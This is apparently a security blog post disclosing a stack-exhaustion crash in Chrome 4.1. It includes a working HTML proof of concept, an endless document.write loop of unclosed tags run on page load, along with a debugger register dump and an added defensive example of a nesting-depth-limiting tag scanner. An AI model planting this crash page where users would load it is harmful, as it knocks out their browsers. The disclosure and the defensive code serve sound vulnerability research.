Google Chrome remote stack exhaustion in chrome.dll
After first finding this bug I tested it a few times. It turns out that it sometimes works and sometimes the "wait" or "close page" dialog box pops up; sometimes the stack exhaustion still triggers after requesting to close the window, and sometimes it just won't work. It is fairly random in my opinion, but opening the code in a couple of tabs should do the job.
I tested this on a machine with the following specs:
x86 Windows XP SP3 VirtualBox VM with 512 MB base memory and Google Chrome 4.1.249.1064
Here is the exploit code:
<html>
  <head>
    <title>
      Google Chrome remote stack exhaustion in chrome.dll;
      published at http://h.ackack.net;
      found by: Jelmer de Hen
    </title>
    <script>
      // Open it a couple of times, it might not always work;
      // see http://h.ackack.net/?p=323 for more information
      function pataboom(){
        while(1){
          document.write("<acronym>");
        }
      }
    </script>
  </head>
  <body onload="pataboom();"></body>
</html>
And here is a dump of the registers:
eax=00000000 ebx=0000041a ecx=01010101 edx=f5d4a8f0 esi=0012f3f8 edi=00000233
eip=01ddc905 esp=0012f348 ebp=0012f34c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Documents and Settings\owner\Local Settings\Application Data\Google\Chrome\Application\4.1.249.1064\chrome.dll -
chrome_1c30000!ChromeMain+0x1a9685:
01ddc905 a200000000 mov byte ptr ds:[00000000h],al ds:0023:00000000=??
As a temporary workaround I would suggest not opening links you don't trust and turning off JavaScript; since Google is good at patching, I think a patch will come out very soon.
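The root of the crash above is a parser that keeps nesting unclosed elements without any bound. Below is an added example, not code from the original post or from Chrome, of the check a parser needs: a simplified tag scanner that tracks the open-element stack and refuses input once nesting passes a cap (MAX_DEPTH is an assumed value for the demo; a real HTML5 tree builder has more rules, but the bound is the point).

```javascript
// Simplified open-element tracker with a hard nesting limit.
// MAX_DEPTH is an assumed cap chosen for this demo, not a browser constant.
const MAX_DEPTH = 512;

// Void elements never stay on the open-element stack.
const VOID_ELEMENTS = new Set(['br', 'hr', 'img', 'input', 'meta', 'link']);

// Scan markup, maintain a stack of open element names and report the peak depth.
// Returns { ok: false, depth, reason } as soon as the cap is exceeded, instead of
// recursing or allocating without bound the way the crash on this page does.
function countOpenDepth(html, maxDepth = MAX_DEPTH) {
  const stack = [];
  let peak = 0;
  const tagRe = /<\s*(\/?)\s*([a-zA-Z][a-zA-Z0-9]*)[^>]*>/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const closing = m[1] === '/';
    const name = m[2].toLowerCase();
    if (closing) {
      // Pop back to the nearest matching open tag, if any.
      const idx = stack.lastIndexOf(name);
      if (idx !== -1) stack.length = idx;
    } else if (!VOID_ELEMENTS.has(name)) {
      stack.push(name);
      if (stack.length > peak) peak = stack.length;
      if (stack.length > maxDepth) {
        return { ok: false, depth: stack.length, reason: 'nesting depth exceeds ' + maxDepth };
      }
    }
  }
  return { ok: true, depth: peak };
}

// Constructed inputs: a well-formed fragment, and the unclosed-tag pattern from the page.
const BENIGN_FRAGMENT = '<div><p><acronym title="x">ok</acronym><br></p></div>';
const UNCLOSED_FRAGMENT = '<acronym>'.repeat(1000);

if (typeof module !== 'undefined' && require.main === module) {
  console.log(countOpenDepth(BENIGN_FRAGMENT));   // { ok: true, depth: 3 }
  console.log(countOpenDepth(UNCLOSED_FRAGMENT)); // { ok: false, depth: 513, reason: ... }
}
```

The bounded version fails with a clear error on the 513th open tag; the unbounded one is what ends up writing through a null pointer once the stack is gone.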

Hello, I am Jelmer, born in 1991, and I live in Holland. I met Fredrik and Mathias through the internet. You can contact me via email at jelmerdehen [ at ] hotmail [d0t] com, or you can chat with me on IRC.